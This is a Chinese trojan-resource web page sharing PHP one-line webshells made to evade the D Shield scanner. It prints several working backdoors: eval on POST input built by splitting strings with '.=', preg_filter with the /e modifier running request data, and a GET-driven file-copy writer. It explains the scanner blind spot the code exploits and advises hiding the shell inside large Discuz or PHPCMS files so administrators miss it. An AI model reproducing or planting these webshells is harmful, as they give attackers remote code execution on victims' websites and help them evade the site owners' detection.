最新过D盾PHP一句话木马亲测可用 - 中国木马资源网

作者:admin2016-1-7 16:20分类: 免杀PHP大马,过狗PHP木马下载 标签: 过D盾一句话木马 php隐藏木马 php代码调试

今日要分享的php一句话木马:


<?php $str_tmp = "eval"; $str_tmp .= "(";$str_tmp .= "$";$str_tmp .= "_PO";$str_tmp .= "ST[1]);";@eval($str_tmp); ?>


<?php $ad = '|';$ad .='.';$ad .='*|';$ad .='e';@preg_filter('|.*|e', $_REQUEST['1'], ''); ?>


是由:


<?php @preg_filter('|.*|e', $_REQUEST['domain'], ''); ?>

变化而来的。


不难看出两个一句话有相似之处,也就是D盾的软肋。
如果直接使用变量来替换字符D盾是会提示的大概就是这样:

<?php $ad =''|.*|e''; @preg_filter($ad, $_REQUEST['domain'], ''); ?>

web查杀软件.jpg


判断了该函数连接的关键字,有了上次的经验我们就知道D盾对.=没有任何控制,
所以只要把该变量分开使用.=连接即可,便有了这个一句话大概就像这样。

php代码测试.jpg

测试了一下,代码可用,不然又要出丑了。嘿嘿!
有了这招大家就可以自行去diy各种一句话 拆分,然后用.=连接,我顺便把之前那个写入的也贴出来吧:

<?php $item['ad'] = '$_G';$t['a'] = "ET['func']";$a = $item['ad'].$t['a'];$c['a'] = '$_G';$c['b'] = "ET['url']";$c = $c['a'].$c['b'];$items['ad'] = 'co';$ts['a'] =  "py($c,$a);";$b = $items['ad'].$ts['a'];@eval($b); ?>
另外再说一个小技巧,关于隐藏自己一句话的,本人不太建议直接新建文件,因为这样极容易被发现,建议还是写入到网站自身文件之中。
举个简单的例子:

隐藏php一句话.jpg
也就是不要把你这些一眼就能看出来是一句话的玩意,直接放到管理员的监控之下,
像discuz,phpcms这种随随便便一个文件几百行代码的,管理怎么可能去在意一个判断,顶多就是还原程序。

来源:asp大马官网 转载注明出处!

温馨提示如有转载或引用以上内容之必要,敬请将本文链接作为出处标注,谢谢合作!

已有 0/5265 人参与

发表评论:




欢迎使用手机扫描访问本站,还可以关注微信哦~